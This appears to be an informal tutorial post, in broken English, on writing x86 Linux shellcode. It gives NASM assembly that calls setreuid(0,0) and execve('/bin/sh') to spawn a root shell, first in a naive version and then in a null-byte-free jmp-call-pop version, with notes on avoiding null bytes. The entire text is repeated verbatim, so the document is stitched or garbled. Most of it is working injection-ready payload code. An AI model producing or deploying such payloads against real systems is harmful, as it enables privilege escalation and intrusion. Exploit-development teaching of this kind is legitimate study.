write shell code is a intresting thing, so that let me do it myself!
the first vision of it, not a real shell code, but just like it !
section .data
filepath db "/bin/shXAAAABBBB" ; the string
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0
mov ebx,filepath
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov eax,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
the second vision is , you see we take the data segment into code segment
;; setruid(uid_t ruid,uid_t euid)
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code
int 0x80
jmp short two
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db "/bin/shXAAAABBBB"
be careful, the code "xor eax,eax" is the same function to "mov eax,0", but why we use it?
because "mov eax,0" will compile to "b8 00 00 00 00" it will end the shell code, (in c the 0 is the end of the string).
and we change "mov eax,70" to "mov al,70" is the same reason.
try to see the execute code youself. if you do not know how to see, or you do not have a hex edit , you can try the hexedit write by me, i have gave the source code before. it is write in c , copy it , and compiler it in gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shell code, for me it is like this "./hexedit shellcode".
now we have done a half, to write a good shell code, let's go father!
the first vision of it, not a real shell code, but just like it !
section .data
filepath db "/bin/shXAAAABBBB" ; the string
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0
mov ebx,filepath
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov eax,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
the second vision is , you see we take the data segment into code segment
;; setruid(uid_t ruid,uid_t euid)
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code
int 0x80
jmp short two
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80
two:
call one
db "/bin/shXAAAABBBB"
be careful, the code "xor eax,eax" is the same function to "mov eax,0", but why we use it?
because "mov eax,0" will compile to "b8 00 00 00 00" it will end the shell code, (in c the 0 is the end of the string).
and we change "mov eax,70" to "mov al,70" is the same reason.
try to see the execute code youself. if you do not know how to see, or you do not have a hex edit , you can try the hexedit write by me, i have gave the source code before. it is write in c , copy it , and compiler it in gcc like this "gcc -o hexedit hexedit.c", and then you can use it to see the shell code, for me it is like this "./hexedit shellcode".
now we have done a half, to write a good shell code, let's go father!